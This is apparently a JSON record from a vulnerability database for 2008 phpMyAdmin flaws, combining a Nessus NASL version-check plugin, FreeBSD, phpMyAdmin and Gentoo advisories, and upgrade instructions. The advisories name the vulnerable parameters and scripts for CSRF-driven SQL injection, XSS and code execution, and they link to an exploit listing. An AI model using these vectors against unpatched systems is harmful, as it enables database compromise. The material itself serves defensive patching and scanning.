"2021-01-17T14:03:39", "description": "This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. (CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : phpMyAdmin (phpMyAdmin-442)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3197", "CVE-2008-1924", "CVE-2008-2960", "CVE-2008-5622", "CVE-2008-4326", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-4096", "CVE-2008-5621"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:phpMyAdmin"], "id": "SUSE_11_0_PHPMYADMIN-090119.NASL", "href": "https://www.tenable.com/plugins/nessus/40107", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update phpMyAdmin-442.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40107);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1149\", \"CVE-2008-1567\", \"CVE-2008-1924\", \"CVE-2008-2960\", \"CVE-2008-3197\", \"CVE-2008-4096\", \"CVE-2008-4326\", \"CVE-2008-5621\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (phpMyAdmin-442)\");\n script_summary(english:\"Check for the phpMyAdmin-442 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. (CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=369063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=375320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=383135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=403093\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=409459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=410768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=426517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=450796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=457889\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 79, 89, 200, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"phpMyAdmin-2.11.9.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5621"], "description": "\nThe phpMyAdmin Team reports:\n\nA logged-in user can be subject of SQL injection through cross\n\t site request forgery. Several scripts in phpMyAdmin are\n\t vulnerable and the attack can be made through table parameter.\n\n", "edition": 4, "modified": "2010-05-02T00:00:00", "published": "2008-12-09T00:00:00", "id": "54F72962-C7BA-11DD-A721-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html", "title": "phpmyadmin -- cross-site request forgery vulnerability", "type": "freebsd", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "phpmyadmin": [{"lastseen": "2019-05-29T17:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2008-5622", "CVE-2008-5621"], "description": "## PMASA-2008-10\n\n**Announcement-ID:** PMASA-2008-10\n\n**Date:** 2008-12-09\n\n### Summary\n\nSQL injection through XSRF on several pages\n\n### Description\n\nA logged-in user can be subject of SQL injection through cross site request forgery. Several pages which use affected library in phpMyAdmin are vulnerable and the attack can be made through `table` parameter.\n\n### Severity\n\nWe consider this vulnerability to be serious.\n\n### Affected Versions\n\nFor 2.11.x: versions before 2.11.9.4.<br /> For 3.x: versions before 3.1.1.0.<br />\n\n### Solution\n\nUpgrade to phpMyAdmin 2.11.9.4 or 3.1.1.0 or apply patch listed below.\n\n### References\n\nAdvisory: <https://www.exploit-db.com/exploits/7382>\n\nAssigned CVE ids: [CVE-2008-5621](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5621>) [CVE-2008-5622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5622>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-89](<https://cwe.mitre.org/data/definitions/89.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [01685c90aaba943511de0496e7ecb7fe49fa765b](<https://github.com/phpmyadmin/phpmyadmin/commit/01685c90aaba943511de0496e7ecb7fe49fa765b>)\n\nThe following commits have been made on the 2.11 branch to fix this issue:\n\n * [0d4adbfc1996c7d715b0ac9fa39a2ac14d8b28ad](<https://github.com/phpmyadmin/phpmyadmin/commit/0d4adbfc1996c7d715b0ac9fa39a2ac14d8b28ad>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "edition": 2, "modified": "2008-12-09T00:00:00", "published": "2008-12-09T00:00:00", "id": "PHPMYADMIN:PMASA-2008-10", "href": "https://www.phpmyadmin.net/security/PMASA-2008-10/", "title": "SQL injection through XSRF on several pages", "type": "phpmyadmin", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:44", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5977", "CVE-2008-5622", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "edition": 1, "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases. \n\n### Description\n\nMultiple vulnerabilities have been reported in phpMyAdmin: \n\n * libraries/database_interface.lib.php in phpMyAdmin allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function (CVE-2008-4096). \n * Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977 (CVE-2008-4775). \n * Cross-site request forgery (CSRF) vulnerability in phpMyAdmin allows remote authenticated attackers to perform unauthorized actions as the administrator via a link or IMG tag to tbl_structure.php with a modified table parameter. NOTE: this can be leveraged to conduct SQL injection attacks and execute arbitrary code (CVE-2008-5621). \n * Multiple cross-site request forgery (CSRF) vulnerabilities in phpMyAdmin allow remote attackers to conduct SQL injection attacks via unknown vectors related to the table parameter, a different vector than CVE-2008-5621 (CVE-2008-5622). \n\n### Impact\n\nA remote attacker may execute arbitrary code with the rights of the webserver, inject and execute SQL with the rights of phpMyAdmin or conduct XSS attacks against other users. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-2.11.9.4\"", "modified": "2009-03-18T00:00:00", "published": "2009-03-18T00:00:00", "id": "GLSA-200903-32", "href": "https://security.gentoo.org/glsa/200903-32", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
